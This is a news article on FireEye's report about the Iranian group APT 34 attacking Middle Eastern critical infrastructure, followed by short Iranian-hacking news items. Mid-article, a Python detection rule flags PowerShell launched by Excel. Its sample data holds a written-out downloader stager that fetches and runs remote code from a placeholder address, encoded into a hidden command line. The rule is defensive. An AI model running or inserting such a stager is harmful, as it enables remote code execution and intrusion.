The international intelligence community always has a keen interest in Iran’s hacking activity. And new research published by the security firm FireEye on Thursday indicates the country’s efforts show no signs of slowing. In fact, a new network reconnaissance group, which FireEye calls Advanced Persistent Threat 34, has spent the last few years burrowing deep into critical infrastructure companies.

Given how aggressively Iran has pursued infrastructure hacking, previously targeting the financial sector and even a dam in upstate New York, the new findings serve as a warning, and highlight the evolving nature of the threat.

FireEye researchers tracked 34 of the group’s attacks on institutions in seven Middle Eastern countries between 2015 and mid-2017, but say APT 34 has been operational since at least 2014. The group appears to target financial, energy, telecommunications, and chemical companies, and FireEye says it has moderate confidence that the hackers are Iranian: they log into VPNs from Iranian IP addresses, keep normal Iranian business hours, their work has occasionally leaked Iranian addresses and phone numbers, and their efforts align with Iranian interests, namely targeting the country’s adversaries.

New APT in Town

There isn’t definitive evidence of a direct link between APT 34 and APT 33, an Iranian hacking group and malware distributor on which FireEye published findings in September. But researchers have seen APT 34 operating concurrently inside many of the same target networks as other Iranian hackers.

“We have seen, and this is with a lot of the Iranian actors, a very disconcerting or aggressive posture towards critical infrastructure organizations,” says John Hultquist, director of intelligence analysis at FireEye. “APT 33 has targeted a lot of organizations in critical infrastructure in the Middle East and so has APT 34. They obviously represent opportunities for intelligence collection. But we always have to think about the alternative use of those intrusions or accesses as possible means for disruption and destruction, especially given the destructive incidents we’ve already seen with other Iranian actors.”

To establish what Hultquist describes as beachheads, APT 34 runs involved operations to move deeper and deeper into a network, or exploits a toehold within one organization to pivot into another. FireEye has observed the group compromise an email account at a target company, rifle through its archive, and revive threads as old as a year to trick the recipient into opening a malicious attachment. Because the reply arrives from a real colleague’s mailbox and continues a genuine conversation, it passes the sender checks and the gut check that a cold spearphish would fail. The hackers also use compromised email accounts to spearphish other companies, and leapfrog into their systems as well.

While APT 34’s activity doesn’t appear to target the United States, any Iranian efforts in that space are noteworthy. The countries have a long history of cyber antagonism, which includes the deployment of Stuxnet, malware thought to be a product of the NSA and its Israeli counterparts, to cripple Iran’s uranium enrichment activities. Tensions between the countries have escalated recently as well, with President Donald Trump taking steps to decertify the nuclear agreement between the US and Iran.

‘A Multilayered Approach’
APT 34 uses malicious Excel macros and PowerShell-based tooling to move around networks. The group also has fairly extensive social media operations, deploying fake or compromised accounts to scope out high-profile targets, and using social engineering to get closer to particular organizations. FireEye researchers speculate that APT 34 may be a reconnaissance and persistence unit, focused on finding ways into new networks and broadening access within existing targets. Some evidence indicates that the group may work directly for the Iranian government, but it’s also possible that the hackers are effectively contractors, selling backdoors to the government as they find them.
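The macro-to-PowerShell chain described above is one of the easier parts of this tradecraft to catch in endpoint telemetry: a spreadsheet has no business launching a shell, and macro droppers tend to pass the same handful of flags (hidden window, no profile, base64-encoded command). The Python below is an added example, not code from FireEye or from the article, that applies that parent/child rule to process-creation records and decodes any -EncodedCommand payload so an analyst sees the script rather than a base64 blob. The field names mirror Sysmon Event ID 1 (ParentImage, Image, CommandLine); the records themselves, the payload string and its 198.51.100.7 TEST-NET address are all constructed for the demo.

```python
"""Flag PowerShell spawned by an Office parent, as a malicious Excel macro would.

Added example, not FireEye's or the article's code. Event dicts use Sysmon
Event ID 1 field names; every record below is constructed, not real telemetry.
"""
import base64
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
PS_IMAGES = {"powershell.exe", "pwsh.exe"}

# Flags that macro droppers commonly pass so the shell runs unseen and unimpeded.
SUSPICIOUS_FLAGS = {
    "hidden_window":      re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile":         re.compile(r"-nop(?:rofile)?\b", re.I),
    "exec_policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "non_interactive":    re.compile(r"-noni(?:nteractive)?\b", re.I),
}
# -EncodedCommand (and its short forms) takes base64 of a UTF-16LE script.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased (EXCEL.EXE -> excel.exe)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(b64: str):
    """Recover the plaintext script from a -EncodedCommand argument, or None."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(ev: dict):
    """Return a finding for Office -> PowerShell launches, else None."""
    parent, child = image_name(ev.get("ParentImage", "")), image_name(ev.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in PS_IMAGES:
        return None
    cmd = ev.get("CommandLine", "")
    flags = [name for name, rx in SUSPICIOUS_FLAGS.items() if rx.search(cmd)]
    m = ENC_FLAG.search(cmd)
    decoded = decode_encoded_command(m.group(1)) if m else None
    # Parent/child pair alone is worth a look; each evasion flag and a
    # decodable payload raise the score for triage ordering.
    score = 1 + len(flags) + (2 if decoded is not None else 0)
    return {"parent": parent, "child": child, "flags": flags,
            "decoded": decoded, "score": score, "command_line": cmd}


def detect(events):
    """Run the rule over a batch of process-creation events."""
    return [f for f in (analyse_event(e) for e in events) if f]


# Constructed sample telemetry. The payload is a typical one-line downloader
# stager; the address is from the TEST-NET-2 range and is not a real C2.
MACRO_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/u')"
ENCODED = base64.b64encode(MACRO_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # macro-launched shell: hidden, no profile, encoded payload
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": f"powershell.exe -NoP -NonI -W Hidden -Enc {ENCODED}",
    },
    {   # an admin running a script from Explorer: same flags, benign parent
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
    },
    {   # Excel spawning cmd.exe: worth its own rule, out of scope for this one
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c dir",
    },
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"[score {finding['score']}] {finding['parent']} -> {finding['child']}")
        print("  flags:  ", ", ".join(finding["flags"]) or "none")
        print("  decoded:", finding["decoded"])
```

The rule deliberately keys on the parent/child pair rather than on the flags: a dropper can drop every flag and still be caught, while the flags and the decoded payload only order the queue. In production the same logic runs against Sysmon or EDR process events, and the decoded script is what you hand to the analyst.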

“When you look at this, it’s a multilayered approach,” says Jeff Bardin, the chief intelligence officer of the threat-tracking firm Treadstone 71, which monitors Iranian hacking activity. “They get in and make a lot of modifications, download new malware, manipulate the memory, so it’s definitely pretty sophisticated. And the PowerShell activity has been largely a hallmark of Iranian activity lately. They change their tactics constantly. The more we divulge things we know about them, the more they’ll shift and change.”

Though much remains unknown about APT 34, its capabilities and prowess make the group’s interest in critical infrastructure targets all the more noteworthy, whether it’s tasked with carrying out full operations itself, or charged with laying the groundwork for others to do so.

“This is yet another example of Iranian cyber capability, which only seems to grow every day,” FireEye’s Hultquist says. “It’s a challenge for people who are concerned with Iranian actors, and as geopolitics shifts, the number of people who should be concerned with Iranian actors will probably only increase.”


Iranian Hackers Have Set Up a News Outlet to Court Possible Targets, Security Firm Says

An Iranian cyber espionage group known as Charming Kitten is believed to be behind a campaign targeting academic researchers, human rights activists, media outlets and political advisors focusing on Iran, according to a report published earlier this week by Israel-based threat intelligence company ClearSky Cyber Security. The group has also set up a news outlet […]

Iranian national charged with hacking HBO

Source: National Cyber Security – Produced By Gregory Evans

The Department of Justice on Tuesday charged an Iranian national with hacking the computer servers of HBO and seeking to extort the company after stealing episodes and scripts of popular shows, including “Game of Thrones.”

Behzad Mesri, aka “Skote Vashat,” was charged with fraud, aggravated identity theft and interstate transmission of an extortionate communication, among other charges, according to a newly unsealed indictment.

According to the U.S. Attorney’s Office in the Southern District of New York, Mesri is not in custody. The FBI released a “wanted” poster of Mesri Tuesday afternoon, and said he speaks Farsi, currently resides in Iran and is a flight risk.

The prosecutors’ office also said they were not aware of any U.S. lawyer for the defendant.

Assistant director in charge of the FBI’s New York field office Bill Sweeney said at a news briefing that Mesri “lurked in the alleyways of the Internet, identified the vulnerabilities of his victim, pickpocketed their information from thousands of miles away and sought a ransom. Today’s charges show that international cybercriminals are never beyond the reach of U.S. laws.”

Mesri, who was a “self-professed expert in computer hacking techniques,” according to the indictment, at one point worked on behalf of the Iranian military to “conduct computer network attacks that targeted military systems, nuclear software systems and Israeli infrastructure.”

The indictment also reveals Mesri defaced hundreds of websites in both the U.S. and globally under his pseudonym Skote Vashat.

Between May and August, Mesri carried out his hacking and extortion scheme against HBO, working to obtain “unauthorized access to HBO’s computer systems” and “steal proprietary data from those systems.”

Mesri then attempted to extort HBO for $6 million worth of Bitcoin, a form of digital currency.

The confidential and proprietary data he stole from HBO included video files of unaired episodes of “Ballers,” “Barry,” “Room 104,” “Curb Your Enthusiasm,” and “The Deuce,” scripts and plots for “Game of Thrones,” cast and crew contact lists, financial documents, emails belonging to at least one HBO employee, and login information for HBO social media accounts.

The extortion scheme began in July, the indictment alleges.

“Hi to All losers! Yes it’s true! HBO is hacked! … Beware of heart Attack!!!” an anonymous email sent to HBO personnel on July 23 included in the complaint reads. The email claimed 1.5 terabytes of data was stolen.

The indictment alleges starting around July 30 and continuing to at least August, the defendant leaked portions of the stolen data to the Internet on websites he controlled.

HBO, which is owned by Time Warner, struggled over the summer with numerous high-profile hackings. A group called OurMine hijacked HBO’s main Twitter account, as well as other HBO shows’ accounts.


Facebook’s new alert system warned the US about Iranian hackers


How do you think the US would find out about a state-sponsored hack from Iran? Sophisticated security software? Surveillance? Nope — Facebook. According to the New York Times, State Department officials were tipped off about an Iranian hacking campaign thanks to Facebook implementing a government attack alert system just last month. They knew something was up when they got messages about being the victims of “state-sponsored actors.” Reportedly, the cyberattackers were hoping to use the social networking accounts of younger government staff to compromise other, more prominent staffers in the government division. Iran is no stranger to online spying, including through social links. It once created a fake news site to trick officials into compromising their accounts, and it launched a hacking campaign last year that targeted everyone from government higher-ups to dissidents. However, this latest attempt was clearly very sophisticated, an unnamed official tells the NYT. The intruders were aware of which people were working on Iranian policy following its nuclear agreement with the US, and the bottom-up approach is considerably smarter than the all-out Russian attacks from recent memory. From all indications, Iran is trying to get away with as much hacking as it can without wrecking its nuclear deal — it’s […]


Security Researchers Breach Phishing Server Belonging to Iranian Hackers Rocket Kitten


Rocket Kitten is a hacking group that first appeared in April 2014 and was unmasked for the first time by FireEye researchers in May 2014. The most damning report on its activity was published this year as a joint effort between Trend Micro and ClearSky. Since its first appearance, the group’s main targets have been individuals and institutions that oppose or criticize the Iranian government. As both the original Trend Micro and ClearSky report and the latest Check Point findings show, the group’s MO consists of launching spear-phishing campaigns against its targets, using social engineering tactics, and then infecting the victims’ computers with malware. Its tactics never evolved past this point; the group only made small tweaks to its tooling to avoid detection by security tools. Despite being publicly exposed this September, Check Point reveals that the state-sponsored hackers continued their operations regardless, making tiny changes to their malicious code and carrying on as if nothing had happened.

Check Point researchers got their hands on a phishing server used by Rocket Kitten

This was confirmed when Check Point researchers uncovered one of the group’s phishing servers left unprotected online. Siphoning information from that server, the researchers managed to build […]


Israel to Create Cyber Security Authority after Alleged Iranian Hacker Attack

National Cyber Security – Israel is planning to create a new cyber defense body in order to protect itself against increasingly sophisticated cyber-attacks targeting the state’s networks, as announced by Israeli Prime Minis…
